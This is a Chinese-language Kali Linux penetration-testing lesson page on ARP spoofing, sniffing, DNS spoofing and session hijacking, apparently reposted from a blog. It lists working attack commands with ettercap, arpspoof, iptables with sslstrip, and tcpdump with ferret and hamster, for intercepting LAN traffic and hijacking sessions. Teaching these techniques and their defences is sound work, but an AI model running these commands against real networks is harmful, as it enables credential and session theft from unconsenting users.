Kali Linux Web 渗透测试视频教程—第十四课-arp欺骗、嗅探、dns欺骗、session劫持

本文涉及的产品
全局流量管理 GTM,标准版 1个月
云解析 DNS,旗舰版 1个月
公共DNS(含HTTPDNS解析),每月1000万次HTTP解析
简介:

Kali Linux Web 渗透测试视频教程—第十四课-arp欺骗、嗅探、dns欺骗、session劫持

/玄魂

目录

Kali Linux Web 渗透测试—第十四课-arp欺骗、嗅探、dns欺骗、session劫持      1

关于嗅探、arp欺骗、会话劫持.............................................................. 1

 

视频教程地址:http://edu.51cto.com/course/course_id-1887.html

关于嗅探、arp欺骗、会话劫持

l  1. google

l  2. http://www.cnblogs.com/xuanhun/archive/2009/01/05/1369828.html

l  http://www.cnblogs.com/xuanhun/archive/2009/04/22/1441274.html

会话劫持的实现手段

 

l  中间人攻击(arp欺骗,dns欺骗)

l  注射式攻击

Arp欺骗--ettercap

l  参数说明:http://www.91ri.org/4408.html

l  2.如果你是第一次进行中间人攻击操作,那么要对kali下的ettercap做点配置,配置文件是/etc/ettercap/etter.conf
首先你要将EC_UID EC_GID都变为0,然后找到LINUX分类下的IF YOU USE IPTABLES这一行,将注释(“#”号)去掉,打开转发。

3./etc/NetworkManager/NetworkManager.conf  修改

4.service network-manager restart

5.echo 1 >> /proc/sys/net/ipv4/ip_forward

6. ettercap -i wlan0 -Tq -M arp:remote /192.168.2.20/ /192.168.2.1/

Arp欺骗arpspoof

l   echo 1 >> /proc/sys/net/ipv4/ip_forward

l   arpspoof -i eth0 -t 192.168.14.2 192.168.14.132

数据包捕获

l  tcpdump

l  wireshark

l  drafnet等其他自动化工具

Ssl数据嗅探

l  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(设置)

l  iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(取消)

l  sslstrip  -p -l 10000 -w log.txt

session劫持-arp欺骗

l  tcpdump -i eth0 -w qq.cap

l  ferret -r qq.cap

l  hamster

l  http://hamster

l  选择目标

l  测试session

64位下ferret 安装

l   dpkg --add-architecture i386

l   apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

l   sudo aptitude install ferret-sidejack:i386

 

session劫持-DNS欺骗

l   1. 使用 ettercap 进行arp欺骗

l   2.修改etter.dns 文件

/etc/ettercap/etter.dns

l   3.启用dns_spoof

课后练习

l  结合前面课程中的 set 工具集,我们在局域网中能做到天衣无缝(钓鱼和消息转发相结合)的钓鱼攻击吗?

l  局域网中的嗅探、钓鱼、session劫持、dns欺骗这一类的攻击的防御方式是什么?

 视频教程地址:http://edu.51cto.com/course/course_id-1887.html

ps:对此文章感兴趣的读者,可以加qq群:Hacking:303242737;Hacking-2群:147098303Hacking-3群:31371755hacking-4:201891680;Hacking-5群:316885176

 


本文转自玄魂博客园博客,原文链接:http://www.cnblogs.com/xuanhun/p/4117209.html,如需转载请自行联系原作者

目录
打赏
0
0
0
0
50
分享
相关文章
Burp Suite Professional 2025.2 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
Burp Suite Professional 2025.2 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
21 12
Burp Suite Professional 2025.2 (macOS, Linux, Windows) - Web 应用安全、测试和扫描
os-copilot在Alibaba Cloud Linux镜像下的安装与功能测试
我顺利使用了OS Copilot的 -t -f 功能,我的疑惑是在换行的时候就直接进行提问了,每次只能写一个问题,没法连续换行更有逻辑的输入问题。 我认为 -t 管道 功能有用 ,能解决环境问题的连续性操作。 我认为 -f 管道 功能有用 ,可以单独创建可连续性提问的task问题。 我认为 | 对文件直接理解在新的服务器理解有很大的帮助。 此外,我还有建议 可以在非 co 的环境下也能进行连续性的提问。
75 7
Intel Linux 内核测试套件-LKVS介绍 | 龙蜥大讲堂104期
《Intel Linux内核测试套件-LKVS介绍》(龙蜥大讲堂104期)主要介绍了LKVS的定义、使用方法、测试范围、典型案例及其优势。LKVS是轻量级、低耦合且高代码覆盖率的测试工具,涵盖20多个硬件和内核属性,已开源并集成到多个社区CICD系统中。课程详细讲解了如何使用LKVS进行CPU、电源管理和安全特性(如TDX、CET)的测试,并展示了其在实际应用中的价值。
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
本指南介绍如何利用 HTA 文件和 Metasploit 框架进行渗透测试。通过创建反向 shell、生成 HTA 文件、设置 HTTP 服务器和发送文件,最终实现对目标系统的控制。适用于教育目的,需合法授权。
90 9
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
|
2月前
|
Metasploit Pro 4.22.6-2024111901 (Linux, Windows) - 专业渗透测试框架
Metasploit Pro 4.22.6-2024111901 (Linux, Windows) - 专业渗透测试框架
61 9
Metasploit Pro 4.22.6-2024111901 (Linux, Windows) - 专业渗透测试框架
|
7天前
|
Linux系统之whereis命令的基本使用
Linux系统之whereis命令的基本使用
50 23
Linux系统之whereis命令的基本使用
Linux 超级强大的十六进制 dump 工具:XXD 命令,我教你应该如何使用!
在 Linux 系统中,xxd 命令是一个强大的十六进制 dump 工具,可以将文件或数据以十六进制和 ASCII 字符形式显示,帮助用户深入了解和分析数据。本文详细介绍了 xxd 命令的基本用法、高级功能及实际应用案例,包括查看文件内容、指定输出格式、写入文件、数据比较、数据提取、数据转换和数据加密解密等。通过掌握这些技巧,用户可以更高效地处理各种数据问题。
344 8
|
3月前
|
如何检查 Linux 内存使用量是否耗尽?这 5 个命令堪称绝了!
本文介绍了在Linux系统中检查内存使用情况的5个常用命令:`free`、`top`、`vmstat`、`pidstat` 和 `/proc/meminfo` 文件,帮助用户准确监控内存状态,确保系统稳定运行。
1131 6

相关产品

  • 云解析DNS
  • AI助理

    你好,我是AI助理

    可以解答问题、推荐解决方案等